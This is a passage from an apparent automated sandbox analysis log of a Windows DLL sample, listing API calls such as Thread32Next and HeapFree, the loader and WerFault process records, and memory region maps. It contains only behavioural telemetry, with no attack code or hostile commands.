(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.978] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0244.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0245.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0282.019] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0282.033] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0283.925] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0286.582] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0286.583] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0286.583] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0286.583] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0286.584] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0286.584] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0286.584] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567100 | out: hHeap=0x550000) returned 1 [0286.584] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0286.584] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b5d0 | out: hHeap=0x550000) returned 1 [0286.584] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554fb0 | out: hHeap=0x550000) returned 1 [0286.584] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554ff0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5604b0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x555030 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x555070 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b840 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x553ce0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b780 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x553ed0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5540a0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x552600 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x553f10 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x553f30 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560be0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b900 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560e10 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ba30 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ba50 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b6f0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b7b0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5681a0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b750 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ba70 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55baf0 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x558d10 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x558d30 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568320 | out: hHeap=0x550000) returned 1 [0286.585] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568360 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5693b0 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b9f0 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569310 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b810 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569170 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55a480 | out: hHeap=0x550000) returned 1 [0286.586] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554870 | out: hHeap=0x550000) returned 1 [0286.588] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565ef0 | out: hHeap=0x550000) returned 1 [0286.588] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0286.588] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55acb0 | out: hHeap=0x550000) returned 1 [0286.588] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565b20 | out: hHeap=0x550000) returned 1 [0286.588] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0286.589] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0286.589] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0286.589] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0286.589] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0286.591] LocalFree (hMem=0x559780) returned 0x0 [0286.591] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0286.591] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0286.591] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x561080 | out: hHeap=0x550000) returned 1 [0286.592] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564690 | out: hHeap=0x550000) returned 1 [0286.592] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0286.592] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0286.593] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0286.593] ExitProcess (uExitCode=0x0) [0286.593] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55c330 | out: hHeap=0x550000) returned 1 Thread: id = 199 os_tid = 0x102c Process: id = "25" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0xf45e000" os_pid = "0x1040" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xc9c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "26" image_name = "werfault.exe" filename = "c:\\windows\\system32\\werfault.exe" page_root = "0xff50000" os_pid = "0x10b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xc9c" cmd_line = "C:\\Windows\\system32\\WerFault.exe -u -p 3228 -s 408" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6276 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6277 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6278 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6279 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 6280 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6281 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6282 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6283 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6284 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 6285 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 6286 start_va = 0x7ff71c810000 end_va = 0x7ff71c85afff monitored = 0 entry_point = 0x7ff71c831610 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\System32\\WerFault.exe" (normalized: "c:\\windows\\system32\\werfault.exe") Region: id = 6287 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6288 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 6289 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6290 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6291 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6292 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 6293 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6294 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = 